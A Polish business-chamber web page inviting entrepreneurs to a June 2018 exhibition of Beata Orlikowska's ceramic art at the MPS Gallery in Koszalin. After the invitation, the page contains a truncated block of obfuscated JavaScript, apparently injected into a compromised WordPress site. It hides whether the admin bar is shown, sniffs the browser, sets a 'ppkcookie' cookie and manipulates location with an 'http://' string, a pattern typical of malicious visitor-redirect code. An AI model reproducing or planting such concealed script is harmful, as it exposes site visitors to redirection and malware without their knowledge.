Zaproszenie na wernisaż prac Beaty Orlikowskiej | Północna Izba Gospodarcza w Koszalinie

Szanowny Państwo, Drodzy Przedsiębiorcy!

W imieniu Zarządu MPS International Sp. z o.o. oraz w imieniu Autorki Beaty Orlikowskiej serdecznie zapraszamy na siódmy już wernisaż w Galerii MPS.

Tym razem pokażemy twórczość zupełnie odmienną od pokazanych dotychczas – ceramikę unikatową  pani Beaty Orlikowskiej, autorki wielu autorskich projektów, w tym m.in. projektu nagrody Prezydenta Miasta Koszalina, czyli Koszalińskich Orłów. Artystka tworzy prace wielko- i małoformatowe, wykonane w porcelanie, przy użyciu techniki tlenkowej. Na wernisażu zobaczymy ceramiczne obrazy związane z Koszalinem. Tytuł wystawy to „Na ceramicznym szlaku. Koszalin – miasto moje.” Wernisażowi będzie towarzyszyć rozwiązanie pierwszego dziecięcego konkursu plastycznego MPS. Mamy nadzieję, że nasze wydarzenie ciekawie wpisze się w obchody Dni Koszalina.

Wernisaż odbędzie się w dniu 08.06.2018 r. o g. 15:00 na parterze budynku MPS przy ul. Bohaterów Warszawy 30 w Koszalinie.

Będzie nam niezmiernie miło gościć Pana podczas tego wyjątkowego wydarzenia.

Uprzejmie prosimy o potwierdzenie przybycia do dnia 05.06.2018 r. na adres:

katarzyna.gerlaczynska@mps.koszalin.pl

  'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m